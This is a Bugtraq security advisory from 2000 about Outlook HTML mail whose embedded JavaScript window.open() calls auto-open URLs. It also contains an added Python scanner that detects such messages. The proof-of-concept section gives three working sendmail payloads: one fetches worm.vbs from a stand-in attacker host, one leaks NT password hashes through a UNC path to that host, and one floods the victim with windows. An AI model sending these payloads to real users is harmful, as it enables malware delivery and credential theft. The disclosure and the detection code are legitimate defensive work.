Bugtraq mailing list archives

Microsoft Outlook Malicious URL Vulnerability


From: cassius () HUSHMAIL COM (cassius () HUSHMAIL COM)
Date: Fri, 9 Jun 2000 09:29:26 -0800


[ Microsoft Outlook Malicious URL Vulnerability ]
[ cassius () hushmail com ]

[ Description ]
Outlook HTML messages with embedded JavaScript window.open() calls can
automatically open malicious URLs.  An attacker could use this vulnerability
to make it appear that the user has received an attachment that has passed
all SMTP scanners.  The risk here is high, as this vulnerability could allow
another 'ILoveYou' type virus to propagate with minimal resistance.

This vulnerability also opens Outlook and possibly other HTML/JavaScript
enabled E-mail clients to a variety of other malicious URL attacks.  Examples
of possible attacks seem to be endless.  We have been able to send messages
that, when opened, automatically send an NT user's password hash to a box
running L0phtCrack ( http://www.l0pht.com ) in SMB packet capture mode.  This
is a variation on a known attack that relies on social engineering to get the
victim to click on a link within the message.

We have tested the following exploits against Outlook 2000 and Outlook Express.
We assume that all versions that allow HTML messages with embedded JavaScript
are vulnerable.  Outlook 2000 is not vulnerable when the message is viewed in
the preview pane or if the Outlook Security Update has been installed.

The solution for Outlook 98/2000 users is to install the Outlook E-mail
Security Update.  Outlook Express users should upgrade to Outlook 2000 or
some other mail client.

[ Proof of Concept ]
The following examples use Sendmail to craft the messages.  Outlook does
not normally give you enough control of HTML message source to send these
messages.

Example 1 - Sending Fake Attachments
        
        % sendmail victim@example.com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: I love you not.
        
        <html><script language="JavaScript"><!--
        window.open('http://evilcomputer.example.com/worm.vbs');
        --></script>I have attached a file for you.</html>
        
        .

When the victim opens the message an IE dialog box is displayed that prompts
the user to open the file or download it.  An unsuspecting user could be
tricked into thinking that this 'attachment' has passed all SMTP security
scans.

Example 2 - Requesting NT Password Hashes

Set up L0phtCrack to sniff SMB packets on evilcomputer.  Then send the
following message.
                
        % sendmail victim@example.com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: Give me your hash.
        
        <html><script language="JavaScript"><!--
        window.open('file:////evilcomputer/sharename/thankyou.html');
        --></script>Blah blah blah.</html>
        
        .

Example 3 - Annoying DoS Attack

        % sendmail victim@example.com
        MIME-Version: 1.0
        Content-Type: text/html
        Subject: b00m!
        
        <html><script language="JavaScript"><!--
        for (loop=0; loop < 1000; loop++) { window.open('about:<b><h1>Die!'); }
        --></script></html>
        
        .
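
A gateway-side check for the message shape used in the three examples above,
added here as an illustration and not part of the original advisory: it parses
a raw message with Python's standard email module, counts script tags in
text/html parts, extracts window.open() targets, and flags targets that use
the file: or about: schemes.  The sample messages are constructed for this
example and mirror Example 2; the quarantine policy is an assumption.

```python
import re
from email import message_from_string
from email.message import Message

# Constructed sample modelled on the advisory's Example 2 (not a real capture).
SAMPLE_MESSAGE = """\
MIME-Version: 1.0
Content-Type: text/html
Subject: Give me your hash.

<html><script language="JavaScript"><!--
window.open('file:////evilcomputer/sharename/thankyou.html');
--></script>Blah blah blah.</html>
"""

# Constructed benign HTML message with no script at all.
BENIGN_MESSAGE = """\
MIME-Version: 1.0
Content-Type: text/html
Subject: Lunch

<html><body>See you at noon.</body></html>
"""

SCRIPT_RE = re.compile(r"<script\b", re.IGNORECASE)
WINDOW_OPEN_RE = re.compile(r"window\.open\s*\(\s*['\"]([^'\"]*)['\"]", re.IGNORECASE)
# Schemes a mail client should never auto-open: local/UNC files and about: pages.
RISKY_SCHEMES = ("file:", "about:")

def html_parts(msg: Message):
    """Yield decoded text/html bodies, whether the message is single or multipart."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            charset = part.get_content_charset() or "us-ascii"
            yield part.get_payload(decode=True).decode(charset, errors="replace")

def scan_message(raw: str) -> dict:
    """Count script tags, collect window.open() targets, and mark risky schemes."""
    findings = {"script_tags": 0, "window_open_urls": [], "risky": False}
    for html in html_parts(message_from_string(raw)):
        findings["script_tags"] += len(SCRIPT_RE.findall(html))
        for url in WINDOW_OPEN_RE.findall(html):
            findings["window_open_urls"].append(url)
            if url.lower().startswith(RISKY_SCHEMES):
                findings["risky"] = True
    return findings

def should_quarantine(raw: str) -> bool:
    """Assumed policy: any script in an HTML body, or any risky auto-opened URL."""
    f = scan_message(raw)
    return f["script_tags"] > 0 or f["risky"]
```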

[ Disclaimer ]
The information contained in this advisory is believed to be accurate at
the time of printing, but no representation or warranty is given, express or
implied, as to its accuracy or completeness.  Neither the author nor the
publisher accepts any liability whatsoever for any direct, indirect or
consequential loss or damage arising in any way from any use of, or reliance
placed on, this information for any purpose.
